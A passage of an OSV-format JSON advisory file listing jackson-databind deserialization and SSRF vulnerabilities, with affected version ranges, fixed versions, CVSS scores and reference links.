"https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:27:59Z", "nvd_published_at": "2021-01-07T00:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9mxf-g3x6-wv74", "published": "2019-01-04T19:07:06Z", "modified": "2024-03-14T05:33:39.459890Z", "aliases": [ "CVE-2018-14721" ], "summary": "Server-Side Request Forgery (SSRF) in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.7" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-9mxf-g3x6-wv74/GHSA-9mxf-g3x6-wv74.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], 
"database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-9mxf-g3x6-wv74/GHSA-9mxf-g3x6-wv74.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-9mxf-g3x6-wv74/GHSA-9mxf-g3x6-wv74.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14721" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2097" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-9mxf-g3x6-wv74" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1108" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1107" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1106" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" } ], "database_specific": { "cwe_ids": [ "CWE-918" ], "github_reviewed": true, 
"github_reviewed_at": "2020-06-16T21:29:04Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9vvp-fxw6-jcxr", "published": "2020-05-15T18:58:47Z", "modified": "2024-03-15T01:01:13.767060Z", "aliases": [ "CVE-2020-11113" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-9vvp-fxw6-jcxr/GHSA-9vvp-fxw6-jcxr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11113" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2670" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:31:52Z", "nvd_published_at": "2020-03-31T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c265-37vj-cwcc", "published": "2020-06-18T14:44:48Z", "modified": "2024-06-25T14:18:28.499070Z", "aliases": [ "CVE-2020-14062" ], "summary": "Deserialization of untrusted data in Jackson Databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.4", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c265-37vj-cwcc/GHSA-c265-37vj-cwcc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14062" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2704" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/99001cdb6807b5c7b170ec6a9092ecbb618ae79c" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200702-0003" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-18T13:06:04Z", "nvd_published_at": "2020-06-14T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c2q3-4qrh-fm48", "published": "2020-06-18T14:44:50Z", "modified": "2024-02-17T05:36:21.468281Z", "aliases": [ "CVE-2020-14061" ], "summary": "Deserialization of untrusted data in Jackson 
Databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c2q3-4qrh-fm48/GHSA-c2q3-4qrh-fm48.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14061" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2698" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/5c8642aeae9c756b438ab7637c90ef3c77966e6e" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200702-0003" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316" }, { "type": "WEB", "url": 
"https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-18T13:06:14Z", "nvd_published_at": "2020-06-14T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c8hm-7hpq-7jhg", "published": "2019-01-04T19:07:03Z", "modified": "2024-03-15T01:17:19.251183Z", "aliases": [ "CVE-2018-19362" ], "summary": "com.fasterxml.jackson.core:jackson-databind vulnerable to Deserialization of Untrusted Data", "details": "FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the jboss-common-core class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.8" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": 
"2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19362" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2186" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/72cd4025a229fb28ec133235003dd4616f70afaa" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-c8hm-7hpq-7jhg" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/TINKERPOP-2121" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/107985" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:30:35Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cf6r-3wgc-h863", "published": "2020-05-15T18:58:58Z", "modified": "2024-02-18T05:32:56.325249Z", "aliases": [ "CVE-2019-14892" ], "summary": "Polymorphic deserialization of malicious object in jackson-databind", "details": "A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5, and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. 
An attacker could use this flaw to execute arbitrary code.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-cf6r-3wgc-h863/GHSA-cf6r-3wgc-h863.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.4", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-cf6r-3wgc-h863/GHSA-cf6r-3wgc-h863.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-cf6r-3wgc-h863/GHSA-cf6r-3wgc-h863.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14892" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2462" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/819cdbcab51c6da9fb896380f2d46e9b7d4fdc3b" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0005" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:29:41Z", "nvd_published_at": 
